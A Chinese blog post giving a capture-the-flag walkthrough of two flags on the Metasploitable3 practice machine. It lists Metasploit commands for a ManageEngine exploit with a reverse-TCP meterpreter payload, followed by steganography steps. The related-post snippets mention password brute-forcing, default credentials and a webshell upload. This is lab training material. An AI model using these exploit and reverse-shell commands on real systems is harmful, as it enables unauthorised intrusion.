Metasploitable3-flag

最新推荐文章于 2023-06-06 17:45:23 发布
最新推荐文章于 2023-06-06 17:45:23 发布
阅读量816 收藏 7
点赞数 2
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/makboli/article/details/119801687
版权

Metasploitable3-flag

写这个文章是因老师给了我一个Metasploitable3的靶机,就来搞搞玩玩,然后经过不断地乱撞,最终搞到了15个flag,以下是我寻找15个flag的过程,希望小白的文章能对大家有所帮助。

ace_of_hearts

1.ace_of_hearts
这里刚刚拿到靶场环境,就随便翻了翻电脑里的文件,发现了一张红桃A

然后感觉这应该就是一个flag,打开kali尝试连接该靶机172.21.11.227.
先nmap扫一下,发现了8022端口可以搞一搞

然后打开msf,设置相应的payload,rhost,lhost,target,rport
相关命令:use exploit/windows/http/manageenine_connectionid_write
Set rhosts 172.21.11.227
Set rport 8022
Set lhost 192.168.17.128
Set payload windows/meterpreter/reverse_tcp
设置好相应的参数之后run起来

成功拿到shell
然后进入在靶机发现flag的目录下

下载ace_of_hearts.jpg之后发现还有一个ten_of_diamonds.png也下载下来为下一个flag做打算,
下载ace_of_hearts.jpg之后发现并非flag格式,尝试查看是不是隐写。
利用binwalk发现确实是隐写,里面有一个ace_of_hearts.png文件,接下来利用foremost将图片分离出来,拿到flag。

ten_of_diamonds

在寻找ace的过程中,我们同时下载了ten_of_diamonds.png
但是这个png文件并不能如愿显示flag,由此推断可能是文件里的图片编码被改,这是常见的图片隐写方式。
下面我们用winhex打开刚刚找到的flag:ace_of_hearts.png在这里插入图片描述

再打开ten_of_diamonds.png对比

诶,这就发现了ten_of_diamonds.png的文件头编码不对,并不符合png图片头编码89 50 4E 47。
接下来我们改成一致的编码头,得到了flag
在这里插入图片描述
好了,前两个flag就先到这里了。希望大佬们看了能发表更好的意见指导一下小白。

芝士TOM
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
metasploitable3 第一个flag, King of Diamond
avasy的博客
02-01 2933
nmap扫描对应的端口 192.168.0.105 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10 用浏览器访问一下 打开后网页的下方有一个phpinfo和phpadmin,这时候可以点进去看一下,看相关的信息 从phpinfo中我们得到以下有关靶机的信息 靶机系统版本: Windows NT METASPLOITABLE3 6....
vue-country-flag:国旗的Vue组件
05-01
为了将其与Vue 3配合使用,请按如下所示安装vue-country-flag-next软件包: npm install vue-country-flag-next Vue 2支持 如何安装 从NPM获取软件包: npm install vue-country-flag 如何使用组件 在您的应用...
安装Metasploitable 3
热门推荐
独行者103的专栏
03-01 1万+
相比于Metasploitable 2,Metasploitable 3更加注重对渗透能力的搭建和分析。 我改了以下内容: Autoattend.xml <!-- Do not uncomment the Key element if you are using trial ISOs --> <!-- You must uncomment the Key element...
MSTables3靶机渗透测试(1)- 攻击windows服务器
reqian23
02-27 283
链接:https://pan.baidu.com/s/1YNnoVbT-SPmvs3YawJpqjQ 提取码:nx82 解压文件后用VMware扫描即可 靶机IP地址为192.168.118.4 攻击方为Kali Linux IP地址:192.168.118.1 1.信息收集 用nmap对其进行扫描 msf6 > db_nmap -sV -A -T4 192.168.118.4 2.查看可以利用的信息 msf6 > services 192.168.118.4 接下来再全方位的扫.
构建Metasploitable 靶场环境
cmcaimao的博客
04-17 1807
原文地址:https://github.com/rapid7/metasploitable3 Metasploitable3 Metasploitable3是从头开始构建的VM,具有大量安全漏洞。它旨在用作测试metasploit漏洞的目标。 Metasploitable3是在BSD风格的许可证下发布的。有关更多详细信息,请参见复制。 快速开始 要使用https://app.vag...
体验一把黑客的感觉——Unbuntu下用docker搭一个肉鸡(Metasploitable)来练靶(渗透测试)
最新发布
m0_74942241的博客
06-06 642
本文介绍在Unbuntu环境下用docker来简单快速地搭建起Metasploitable系统,并用Metasploit来进行渗透测试。Metasploitable是一个供渗透测试用的、集成各种漏洞的Linux系统。Metasploita则是一个集成各种漏洞攻击的渗透利器。
vue-country-flag-国家标记图标的Vue组件-Vue.js开发
05-27
vue-country-flag国家标志作为Vue组件如何安装从NPM获取软件包:npm install vue-country-flag如何使用Register CountryFla vue-country-flag国家标志作为Vue组件如何安装NPM:npm install vue-country-flag如何在...
country-flag-emoji:国家代码列表及其标志表情符号
02-05
$ npm install country-flag-emoji CDN 该库可通过CDN获得: < script src =" https://unpkg.com/country-flag-emoji@latest/dist/country-flag-emoji.umd.js " > </ script > <!-- Or the ...
has-flag:检查argv是否具有特定标志
04-29
有标志检查是否具有特定标志安装$ npm install has-flag用法// foo.jsimport hasFlag from 'has-flag' ;hasFlag ( 'unicorn' ) ;//=> truehasFlag ( '--unicorn' ) ;//=> truehasFlag ( 'f' ) ;//=> truehasFlag ( '...
DSP-experiment-for-DMA-TIMER-FLAG.rar_TIMER-FLAG_dma_dmatimer_ds
09-22
这里有实验所用到的源代码和实验报告,对同学们非常有用。。。实验报告给大家作为参考 简介: 实验目的 熟练掌握外部中断原理、外部中断响应方式及对DMA传输进行中断控制原理。 2. 实验原理: 根据外部中断产生原理...
针对 Metasploitable 3 的渗透测试
07-31
针对 Metasploitable 3 的渗透测试-漏洞银行大咖面对面5-Demon
Metasploitable3-flag-six_jack_four
Makboli的博客
08-24 356
Metasploitable3 继上次的继续为师傅们更新!最近生活不如意,但还是要调整好心情继续冲! six_of_diamonds 因为我们之前是扫到了21端口开启,就从21端口下手,因为21端口是ftp服务,大胆一点直接尝试连接ftp 账号vagrant,密码vagrant。因为之前就总是这个,结果一试就连上了,省去了爆破的时间。 将six_of_diamonds.zip文件复制下来,需要密码,也猜测vagrant。结果也对了。 如果不对的话就考虑fcrackzip爆破了 打开拿到flag jack_
Metasploitable3-flag{jack_seven_joker}
Makboli的博客
08-20 672
Metasploitable3 继上一次的两个flag,这次再为大家更新两个新的,希望对大家有帮助。 1.Jack_of_hearts 2.seven_of_spades 3.joker 前言 继上一次的两个flag,这次再为大家更新两个新的,希望对大家有帮助。 1.Jack_of_hearts 第一次扫描发现了22端口的ssh也是可以搞一搞的 接下来我们用kali自带的hydra爆破,利用hydra里面的爆破,爆破用户名和密码,这里其实只需要爆破密码即可。 相关命令:hydra -L username.t
Metasploitable3-flag{K-4-K-}
Makboli的博客
08-31 289
Metasploitable3-flag{K-4-K-} 废话不多说,直接上干货 king_of_clubs 我们下载下来的kingofclubs为.exe文件,将它放进kali里面,利用命令:upx -d kingofclubs.exe 做脱壳处理 之后把它拿出来改为zip文件尝试查看里面的内容。 看到了COFF_SYMBOLS,这个表示疑问,感觉可能会成为入手点。便百度了一下COFF,然后搜到了.out文件的相关知识 看完之后感觉可能是有东西隐藏在了.out文件下吧 尝试一下将kingofclubs.e
Metasploitable3-Ace of Hearts 第八个flag
avasy的博客
02-03 976
这是第八个flag. 结合之前的信息搜集,我们打开nessus的扫描报告 CVE-2015-8249 ZOHOManageEngineDesktopCentral(DC)是美国卓豪(ZOHO)公司的一套桌面管理解决方案。该方案包含软件分发、补丁管理、系统配置、远程控制等功能模块,可对桌面机以及服务器管理的整个生命周期提供支持。ZOHOManageEngineDC9版本中的FileUploadSe...
Metasploitable3-Six of Diamonds 第三个flag
avasy的博客
02-02 1654
在上次渗透中,我发现靶机对应的8585端口里面存在一个upload目录,这让我想到靶机可能存在文件上传漏洞,尝试上传一个菜刀马。 我用到了kali的工具cadaver 在上传php文件前,我首先上传一个txt文件验证一下 先在kali内新建一个txt文件 保存后上传 上传成功,打开浏览器验证 用gedit新建一个chopper.php文件,用cadver上传 上传成功 然后用菜刀连接 我...
渗透测试实例:Metasploitable3靶机
lxy123_com的博客
02-09 3853
实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20 实验目的:对Metasploitable3靶机进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss对靶机进行扫描
Metasploitable安装与介绍
永远是少年
06-01 4481
今天继续给大家介绍渗透测试相关知识,本文主要内容是Metasploitable安装与介绍。 一、Metasploitable介绍 二、Metasploitable下载 三、Metasploitable安装 四、Metasploitable修改网络配置
Vulnhub-GoldenEye靶机渗透
蘇同学的安全屋的博客
08-29 252
GoldenEye、渗透、提权
vue3+ts怎么引用vue-country-flag
05-27
您好,如果您想在 Vue 3 + TypeScript 中使用 `vue-country-flag`,可以按照以下步骤进行: 1. 安装 `vue-country-flag`: ``` npm install vue-country-flag --save ``` 2. 在 Vue 组件中使用 `vue-country-flag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值